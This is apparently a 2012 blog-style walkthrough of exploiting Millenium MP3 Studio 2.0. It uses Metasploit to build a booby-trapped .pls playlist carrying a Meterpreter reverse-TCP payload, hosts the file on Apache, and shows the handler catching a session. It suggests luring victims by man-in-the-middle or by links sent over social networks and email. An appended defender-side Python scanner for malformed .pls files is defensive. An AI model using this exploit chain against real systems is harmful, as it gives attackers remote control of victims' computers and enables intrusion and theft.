Preparation :
[*] Metasploit
[*] Apache2
Briefing :
[*] Build a 0day file for Millenium MP3 Studio 2.0
[*] Move the 0day file to the /var/www/ directory
[*] Wait until the victim plays our 0day file
[*] Game Over
Walkthrough:
1. Build the 0day file for Millenium MP3 Studio 2.0
Command :
msf > use exploit/windows/fileformat/millenium_mp3_pls
Next, we configure our 0day file.
Command :
msf exploit(millenium_mp3_pls) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(millenium_mp3_pls) > set LHOST 172.16.230.1
LHOST => 172.16.230.1
msf exploit(millenium_mp3_pls) > set LPORT 4444
LPORT => 4444
msf exploit(millenium_mp3_pls) > set FILENAME listen-to-me.pls
FILENAME => listen-to-me.pls
msf exploit(millenium_mp3_pls) > set EXITFUNC none
EXITFUNC => none
Check our exploit to make sure no parameter is left empty.
Command :
msf exploit(millenium_mp3_pls) > show options
Module options (exploit/windows/fileformat/millenium_mp3_pls):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   FILENAME  listen-to-me.pls  yes       The file name.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  none             yes       Exit technique: seh, thread, process, none
   LHOST     172.16.230.1     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Universal

Then enter the exploit command to generate the 0day file.
Command :
msf exploit(millenium_mp3_pls) > exploit
[*] Creating 'listen-to-me.pls' file ...
[+] listen-to-me.pls stored at /root/.msf4/local/listen-to-me.pls
OK. Our file has been created and saved in the /root/.msf4/local/ directory under the name listen-to-me.pls.
2. Move the listen-to-me.pls file to the /var/www directory
Use the mv or cp command to move this file.
Command :
root@revolution:~# cp /root/.msf4/local/listen-to-me.pls /var/www/
Then check again that our file has been moved to the /var/www/ directory.
Command :
root@revolution:~# cd /var/www/
root@revolution:/var/www# ll
total 54680
drwxr-xr-x  4 root     root         4096 2012-01-08 14:05 ./
drwxr-xr-x 16 root     root         4096 2011-06-08 20:16 ../
drwxr-xr-x 10 www-data www-data     4096 2012-01-07 19:36 beef/
-rw-r--r--  1 root     root      8156634 2009-12-10 07:48 BigAntServer_Enu_Setup.exe
-rwxrwxrwx  1 root     root      7983311 2011-11-01 15:06 ca_setup.exe*
-rw-r--r--  1 root     root         4160 2012-01-08 14:05 listen-to-me.pls
-rwxrwxrwx  1 root     root      1851184 2012-01-05 18:36 millennium.exe*
-rw-r--r--  1 root     root       102476 2012-01-07 19:57 minishare-1.4.1.exe
-rwxrwxrwx  1 root     root      1269567 2011-12-27 16:51 Savant31.exe*
-rwxrwxrwx  1 root     root     17050136 2011-11-27 09:43 ServUSetup.exe*
-rwxrwxrwx  1 root     root     19541182 2011-11-01 15:05 wireshark-win32-1.6.2.exe*
drwxr-xr-x  2 root     root         4096 2011-05-10 14:44 wstool/
Now we wait until someone grabs this file and opens it with Millenium MP3 Studio 2.0. You can use a MITM approach or send the victim a malicious link via a social network or email. Don't forget to start multi/handler in Metasploit.
Command :
msf exploit(millenium_mp3_pls) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.230.1
LHOST => 172.16.230.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
Check our multi/handler settings again.
Command :
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     172.16.230.1     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Then run exploit to start the multi handler.
Command :
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.230.1:4444
[*] Starting the payload handler...
3. The victim walks into the trap.
And this is what happens when the victim walks into the trap.
Command :
msf exploit(handler) > exploit
[*] Started reverse handler on 172.16.230.1:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 172.16.230.128
[*] Meterpreter session 1 opened (172.16.230.1:4444 -> 172.16.230.128:1187) at 2012-01-08 15:27:02 +0700
meterpreter >
Excellent like usual =)
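As an added defender-side example that is not part of the original post: the whole chain above depends on the victim opening a malformed .pls playlist, so a mail gateway or endpoint check can inspect such files before a media player ever parses them. The script below parses the INI-like .pls format and flags an oversized entry field, non-printable bytes, and a file far larger than a normal playlist; the 1024-byte field limit and 16 KiB file limit are assumptions chosen for this example, and both samples are constructed.

```python
# Added example: a small .pls playlist scanner for defenders.
# Thresholds are assumptions for this example, not values from the
# Metasploit module or from Millenium MP3 Studio itself.
from typing import Dict, List

MAX_FIELD_LEN = 1024      # assumption: no real path or title is this long
MAX_FILE_LEN = 16 * 1024  # assumption: the generated file above was 4160 bytes, real playlists are far smaller


def parse_pls(data: bytes) -> Dict[str, bytes]:
    """Parse the INI-like .pls format into {lowercased key: raw value}, skipping section headers."""
    entries: Dict[str, bytes] = {}
    for raw in data.splitlines():
        line = raw.strip()
        if not line or line.startswith(b"[") or b"=" not in line:
            continue
        key, _, value = line.partition(b"=")
        entries[key.strip().decode("ascii", "replace").lower()] = value.strip()
    return entries


def scan_pls(data: bytes) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings: List[str] = []
    if len(data) > MAX_FILE_LEN:
        findings.append(f"file size {len(data)} exceeds {MAX_FILE_LEN}")
    if not data.lstrip().lower().startswith(b"[playlist]"):
        findings.append("missing [playlist] header")
    for key, value in parse_pls(data).items():
        if len(value) > MAX_FIELD_LEN:
            findings.append(f"{key}: value length {len(value)} exceeds {MAX_FIELD_LEN}")
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append(f"{key}: contains non-printable bytes")
    return findings


# Constructed samples: a normal two-track playlist and one with an oversized, binary-laden entry.
BENIGN_PLS = (b"[playlist]\r\nFile1=C:\\Music\\track01.mp3\r\nTitle1=Track 1\r\nLength1=215\r\n"
              b"File2=C:\\Music\\track02.mp3\r\nNumberOfEntries=2\r\nVersion=2\r\n")
SUSPICIOUS_PLS = b"[playlist]\r\nFile1=" + b"A" * 3000 + b"\x01\x02\r\nNumberOfEntries=1\r\nVersion=2\r\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLS), ("suspicious", SUSPICIOUS_PLS)):
        print(name, scan_pls(sample) or ["clean"])
```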
created by : red-dragon